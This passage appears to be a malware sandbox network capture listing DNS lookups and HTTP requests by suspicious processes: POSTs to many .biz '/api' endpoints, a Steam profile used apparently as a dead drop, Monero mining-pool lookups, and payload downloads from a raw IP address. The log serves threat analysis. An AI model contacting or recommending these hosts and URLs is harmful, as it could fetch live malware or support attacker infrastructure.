                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: dare-curbys.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=fc0bc0iohq19sar5q1m36b6p30; expires=Sat, 29-Mar-2025 22:08:26 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oNgyQxEM7v2216hg%2FjXxZYlKymnrr7VI%2BaE%2FoVlIcTYlDz9pPQHvZjLS1WNHS%2BOG2AnK0n27nbXYxH%2BRedh1vxcpZ%2BrYjoOi2qDqO2oXOeydtb0GCHsN5MJdpxr2HxZUBWw%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec902fc6f5f7201-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=49455&min_rtt=47253&rtt_var=14264&sent=9&recv=10&lost=0&retrans=0&sent_bytes=3952&recv_bytes=913&delivery_rate=84639&cwnd=255&unsent_bytes=0&cid=fff88d97950827f5&ts=2562&x=0"
                          • flag-us
                            POST
                            https://se-blurry.biz/api
                            rhnew.exe
                            Remote address:
                            172.67.162.65:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: se-blurry.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=e98u16i8k56fj8aat3055g7rru; expires=Sat, 29-Mar-2025 22:08:24 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z4my%2B%2Fr1sjdNp9%2BIk7yDs8kA5LoYQwMRhM3BMloBw1Yrj8aoqQooMjp%2FB9daMniwa2c3VsUgxPw4BTGf4iw5AspZWk%2B7Qe%2Fy4fUeGPA8GRXpkP9irDl4vsR13xeWsEvn"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec902f0687bbf09-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=48083&min_rtt=47530&rtt_var=14460&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=581&delivery_rate=85245&cwnd=253&unsent_bytes=0&cid=b150cccb89f1392d&ts=286&x=0"
                          • flag-us
                            POST
                            https://zinc-sneark.biz/api
                            rhnew.exe
                            Remote address:
                            172.67.136.167:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: zinc-sneark.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=c1irv58hmvbiskf4kch9314ujv; expires=Sat, 29-Mar-2025 22:08:25 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mlz1AoJjv3YM7sCDwct%2B2JqBKkWJ4CkXJ3SAIbdsZVULeDW9tJleUnY8b5p3ren%2BPRON8tb9E%2B6rbSvA1%2BzdFpfQZApc4jmq1r6FTdfp5Vt67Kn%2FfgTH%2FR4%2B2EhSbvdyjTo%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec902f2cb277731-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=48844&min_rtt=47125&rtt_var=12584&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=583&delivery_rate=74612&cwnd=253&unsent_bytes=0&cid=c5c08c2ea973aa98&ts=341&x=0"
                          • flag-us
                            POST
                            https://dwell-exclaim.biz/api
                            rhnew.exe
                            Remote address:
                            104.21.88.210:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: dwell-exclaim.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=amfu6kfk7kce09kmjj3c89qv8r; expires=Sat, 29-Mar-2025 22:08:25 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CJzyog5vBKXAPr%2Bfno9iZoKmbquHZX8RYa%2F7KjQGktzz38cASv9m%2F%2FYRHAsBYrvTVX8aM7YRg9C2uYax2%2BbePbVexZ1Ybet%2BYJRs6FIlD5W5kqgUdpXeYcryeNqmgHscOx98vA%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec902f58d5663af-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=48441&min_rtt=47338&rtt_var=11814&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2860&recv_bytes=585&delivery_rate=79005&cwnd=253&unsent_bytes=0&cid=83866c60d72e6079&ts=289&x=0"
                          • flag-us
                            POST
                            https://formy-spill.biz/api
                            rhnew.exe
                            Remote address:
                            104.21.96.55:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: formy-spill.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=92l5814bnoanakaornkg2mbhm6; expires=Sat, 29-Mar-2025 22:08:25 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BD56GsQXZWz7%2BSAD%2FIgabknDZSH%2BrXLw7vIIEBxrWEeCC6nJZf6AjGCLk%2BukY8m6ulDZZmfW3HAFYXZgMnlbt%2F5pmD44DVUIYh0z1Uj%2FmSa%2FuBx2uW6WGPsUekrc3h3X9w0%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec902f7f8113696-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=48963&min_rtt=47774&rtt_var=15748&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2853&recv_bytes=583&delivery_rate=83353&cwnd=253&unsent_bytes=0&cid=cdae191604f9b281&ts=327&x=0"
                          • flag-us
                            POST
                            https://covery-mover.biz/api
                            rhnew.exe
                            Remote address:
                            172.67.206.64:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: covery-mover.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=ja58ve67bpe5u0nc4epjcj359p; expires=Sat, 29-Mar-2025 22:08:26 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HPPXSr5JVPNi8LnnnI9TmzIy87LCl6bdFxM8DfWssRg1etdO4VbBKT7JoA1CGN3U%2Bx9iqIdRX9km6Ct8auDvgFyVmRfSNtDmQrAYVEE%2BmsO4FjiWy2n9l3Ydi033CLFeQack"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec902faae1094c1-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=49599&min_rtt=47333&rtt_var=15510&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2858&recv_bytes=584&delivery_rate=86007&cwnd=253&unsent_bytes=0&cid=32838c91fa7960d3&ts=343&x=0"
                          • flag-us
                            DNS
                            xmr-eu2.nanopool.org
                            cmd.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            xmr-eu2.nanopool.org
                            IN A
                            Response
                            xmr-eu2.nanopool.org
                            IN A
                            51.68.137.186
                            xmr-eu2.nanopool.org
                            IN A
                            163.172.171.111
                            xmr-eu2.nanopool.org
                            IN A
                            51.15.89.13
                            xmr-eu2.nanopool.org
                            IN A
                            51.210.150.92
                            xmr-eu2.nanopool.org
                            IN A
                            51.195.138.197
                            xmr-eu2.nanopool.org
                            IN A
                            51.15.61.114
                            xmr-eu2.nanopool.org
                            IN A
                            51.195.43.17
                          • flag-us
                            POST
                            https://print-vexer.biz/api
                            rhnew.exe
                            Remote address:
                            104.21.35.246:443
                            Request
                            POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: print-vexer.biz
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:21:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Set-Cookie: PHPSESSID=uc767p3t66uu7n6od22tls8jbt; expires=Sat, 29-Mar-2025 22:08:26 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LaBp0HxsUFPBzizrzEfAUaMG57C9dH%2BGLdH49XS7O0aHFjfqOjqtHiI6ufAiasNOf%2BmMafFldtywlwFSAh8z7WnZe1XFnNh39IpmyHjlpWbY%2B8huakQ7%2Feyzz0nDhKjV3vs%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8ec902fe7b39bf04-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=48476&min_rtt=47303&rtt_var=15602&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=583&delivery_rate=86062&cwnd=253&unsent_bytes=0&cid=39393d561e7b37cd&ts=267&x=0"
                          • flag-us
                            DNS
                            steamcommunity.com
                            rhnew.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            steamcommunity.com
                            IN A
                            Response
                            steamcommunity.com
                            IN A
                            2.22.99.85
                          • flag-gb
                            GET
                            https://steamcommunity.com/profiles/76561199724331900
                            rhnew.exe
                            Remote address:
                            2.22.99.85:443
                            Request
                            GET /profiles/76561199724331900 HTTP/1.1
                            Connection: Keep-Alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Host: steamcommunity.com
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx
                            Content-Type: text/html; charset=UTF-8
                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                            Cache-Control: no-cache
                            Date: Wed, 04 Dec 2024 04:21:48 GMT
                            Content-Length: 25984
                            Connection: keep-alive
                            Set-Cookie: sessionid=ad37e1b62598d0e212404056; Path=/; Secure; SameSite=None
                            Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                          • flag-us
                            DNS
                            pastebin.com
                            cmd.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            pastebin.com
                            IN A
                            Response
                            pastebin.com
                            IN A
                            104.20.4.235
                            pastebin.com
                            IN A
                            104.20.3.235
                            pastebin.com
                            IN A
                            172.67.19.24
                          • flag-us
                            DNS
                            xmr-eu1.nanopool.org
                            cmd.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            xmr-eu1.nanopool.org
                            IN A
                            Response
                            xmr-eu1.nanopool.org
                            IN A
                            163.172.154.142
                            xmr-eu1.nanopool.org
                            IN A
                            212.47.253.124
                            xmr-eu1.nanopool.org
                            IN A
                            146.59.154.106
                            xmr-eu1.nanopool.org
                            IN A
                            54.37.137.114
                            xmr-eu1.nanopool.org
                            IN A
                            51.15.65.182
                            xmr-eu1.nanopool.org
                            IN A
                            54.37.232.103
                            xmr-eu1.nanopool.org
                            IN A
                            51.89.23.91
                            xmr-eu1.nanopool.org
                            IN A
                            162.19.224.121
                            xmr-eu1.nanopool.org
                            IN A
                            51.15.58.224
                            xmr-eu1.nanopool.org
                            IN A
                            51.15.193.130
                            xmr-eu1.nanopool.org
                            IN A
                            141.94.23.83
                          • flag-nl
                            GET
                            http://92.63.197.221/files/download
                            6158293fba.exe
                            Remote address:
                            92.63.197.221:80
                            Request
                            GET /files/download HTTP/1.1
                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                            User-Agent: C
                            Host: 92.63.197.221
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:22:03 GMT
                            Server: Apache/2.4.58 (Ubuntu)
                            Content-Length: 1
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                          • flag-nl
                            GET
                            http://92.63.197.221/files/download
                            6158293fba.exe
                            Remote address:
                            92.63.197.221:80
                            Request
                            GET /files/download HTTP/1.1
                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                            User-Agent: C
                            Host: 92.63.197.221
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:22:06 GMT
                            Server: Apache/2.4.58 (Ubuntu)
                            Content-Length: 1
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                          • flag-nl
                            GET
                            http://92.63.197.221/files/download
                            6158293fba.exe
                            Remote address:
                            92.63.197.221:80
                            Request
                            GET /files/download HTTP/1.1
                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                            User-Agent: C
                            Host: 92.63.197.221
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:22:08 GMT
                            Server: Apache/2.4.58 (Ubuntu)
                            Content-Length: 1
                            Keep-Alive: timeout=5, max=98
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                          • flag-nl
                            GET
                            http://92.63.197.221/files/download
                            6158293fba.exe
                            Remote address:
                            92.63.197.221:80
                            Request
                            GET /files/download HTTP/1.1
                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                            User-Agent: C
                            Host: 92.63.197.221
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                          • flag-us
                            DNS
                            prod.balrog.prod.cloudops.mozgcp.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            prod.balrog.prod.cloudops.mozgcp.net
                            IN A
                            Response
                            prod.balrog.prod.cloudops.mozgcp.net
                            IN A
                            35.244.181.201
                          • flag-us
                            DNS
                            prod.balrog.prod.cloudops.mozgcp.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            prod.balrog.prod.cloudops.mozgcp.net
                            IN AAAA
                            Response
                          • flag-us
                            DNS
                            ciscobinary.openh264.org
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            ciscobinary.openh264.org
                            IN A
                            Response
                            ciscobinary.openh264.org
                            IN CNAME
                            a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                            a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                            IN CNAME
                            a17.rackcdn.com
                            a17.rackcdn.com
                            IN CNAME
                            a17.rackcdn.com.mdc.edgesuite.net
                            a17.rackcdn.com.mdc.edgesuite.net
                            IN CNAME
                            a19.dscg10.akamai.net
                            a19.dscg10.akamai.net
                            IN A
                            88.221.134.209
                            a19.dscg10.akamai.net
                            IN A
                            88.221.134.155
                          • flag-us
                            DNS
                            a19.dscg10.akamai.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            a19.dscg10.akamai.net
                            IN A
                            Response
                            a19.dscg10.akamai.net
                            IN A
                            88.221.134.209
                            a19.dscg10.akamai.net
                            IN A
                            88.221.134.155
                          • flag-gb
                            GET
                            http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                            firefox.exe
                            Remote address:
                            88.221.134.209:80
                            Request
                            GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
                            Host: ciscobinary.openh264.org
                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                            Accept: */*
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Connection: keep-alive
                            Response
                            HTTP/1.1 200 OK
                            Last-Modified: Fri, 08 Nov 2024 02:52:28 GMT
                            ETag: 85430baed3398695717b0263807cf97c
                            Content-Length: 453023
                            Accept-Ranges: bytes
                            X-Timestamp: 1731034347.00215
                            Content-Type: application/zip
                            X-Trans-Id: tx264693c458e9421d8a991-006730bfe7dfw1
                            Cache-Control: public, max-age=133509
                            Expires: Thu, 05 Dec 2024 17:27:16 GMT
                            Date: Wed, 04 Dec 2024 04:22:07 GMT
                            Connection: keep-alive
                          • flag-us
                            DNS
                            a19.dscg10.akamai.net
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            a19.dscg10.akamai.net
                            IN AAAA
                            Response
                            a19.dscg10.akamai.net
                            IN AAAA
                            2a02:26f0:a1::58dd:869b
                            a19.dscg10.akamai.net
                            IN AAAA
                            2a02:26f0:a1::58dd:86d1
                          • flag-us
                            DNS
                            redirector.gvt1.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            redirector.gvt1.com
                            IN A
                            Response
                            redirector.gvt1.com
                            IN A
                            172.217.169.46
                          • flag-us
                            DNS
                            redirector.gvt1.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            redirector.gvt1.com
                            IN A
                            Response
                            redirector.gvt1.com
                            IN A
                            172.217.169.46
                          • flag-us
                            DNS
                            redirector.gvt1.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            redirector.gvt1.com
                            IN AAAA
                            Response
                            redirector.gvt1.com
                            IN AAAA
                            2a00:1450:4009:818::200e
                          • flag-us
                            DNS
                            r4---sn-4g5e6ns7.gvt1.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            r4---sn-4g5e6ns7.gvt1.com
                            IN A
                            Response
                            r4---sn-4g5e6ns7.gvt1.com
                            IN CNAME
                            r4.sn-4g5e6ns7.gvt1.com
                            r4.sn-4g5e6ns7.gvt1.com
                            IN A
                            173.194.182.73
                          • flag-us
                            DNS
                            r4.sn-4g5e6ns7.gvt1.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            r4.sn-4g5e6ns7.gvt1.com
                            IN A
                            Response
                            r4.sn-4g5e6ns7.gvt1.com
                            IN A
                            173.194.182.73
                          • flag-us
                            DNS
                            r4.sn-4g5e6ns7.gvt1.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            r4.sn-4g5e6ns7.gvt1.com
                            IN AAAA
                            Response
                            r4.sn-4g5e6ns7.gvt1.com
                            IN AAAA
                            2a00:1450:4001:5c::9
                          • flag-us
                            DNS
                            play.google.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            play.google.com
                            IN A
                            Response
                            play.google.com
                            IN A
                            142.250.187.206
                          • flag-gb
                            POST
                            https://play.google.com/log?hasfast=true&authuser=0&format=json
                            firefox.exe
                            Remote address:
                            142.250.187.206:443
                            Request
                            POST /log?hasfast=true&authuser=0&format=json HTTP/2.0
                            host: play.google.com
                            user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                            accept: */*
                            accept-language: en-US,en;q=0.5
                            accept-encoding: gzip, deflate, br
                            referer: https://consent.youtube.com/
                            content-type: text/plain;charset=UTF-8
                            content-length: 732
                            origin: https://consent.youtube.com
                            sec-fetch-dest: empty
                            sec-fetch-mode: no-cors
                            sec-fetch-site: cross-site
                            te: trailers
                          • flag-us
                            DNS
                            play.google.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            play.google.com
                            IN A
                            Response
                            play.google.com
                            IN A
                            142.250.187.206
                          • flag-us
                            DNS
                            play.google.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            play.google.com
                            IN AAAA
                            Response
                            play.google.com
                            IN AAAA
                            2a00:1450:4009:81f::200e
                          • flag-nl
                            GET
                            http://92.63.197.221/files/download
                            6158293fba.exe
                            Remote address:
                            92.63.197.221:80
                            Request
                            GET /files/download HTTP/1.1
                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                            User-Agent: C
                            Host: 92.63.197.221
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:22:42 GMT
                            Server: Apache/2.4.58 (Ubuntu)
                            Content-Length: 1
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                          • flag-nl
                            GET
                            http://92.63.197.221/soft/download
                            6158293fba.exe
                            Remote address:
                            92.63.197.221:80
                            Request
                            GET /soft/download HTTP/1.1
                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                            User-Agent: d
                            Host: 92.63.197.221
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:22:45 GMT
                            Server: Apache/2.4.58 (Ubuntu)
                            Content-Disposition: attachment; filename="dll";
                            Content-Length: 242176
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: application/octet-stream
                          • flag-nl
                            GET
                            http://92.63.197.221/soft/download
                            6158293fba.exe
                            Remote address:
                            92.63.197.221:80
                            Request
                            GET /soft/download HTTP/1.1
                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                            User-Agent: s
                            Host: 92.63.197.221
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Wed, 04 Dec 2024 04:22:46 GMT
                            Server: Apache/2.4.58 (Ubuntu)
                            Content-Disposition: attachment; filename="soft";
                            Content-Length: 1502720
                            Keep-Alive: timeout=5, max=98
                            Connection: Keep-Alive
                            Content-Type: application/octet-stream
                          • flag-us
                            DNS
                            consent.youtube.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            consent.youtube.com
                            IN A
                            Response
                            consent.youtube.com
                            IN A
                            216.58.201.110
                          • flag-us
                            DNS
                            consent.youtube.com
                            firefox.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            consent.youtube.com
                            IN A
                            Response
                            consent.youtube.com
                            IN A
                            216.58.201.110
                          • flag-ru
                            GET
                            https://188.119.66.185/ai/?key=8f3f2b3ae34f446a2110e0f2231e72eee7c4db7e40b82a8dcd6c946851e300888b3250aa15d305633775b0e650f3ba1e9c95b6d7366bd5f252c480ad1086859254baefb0950502c0d5061cd6352519d0
                            videojet3264.exe
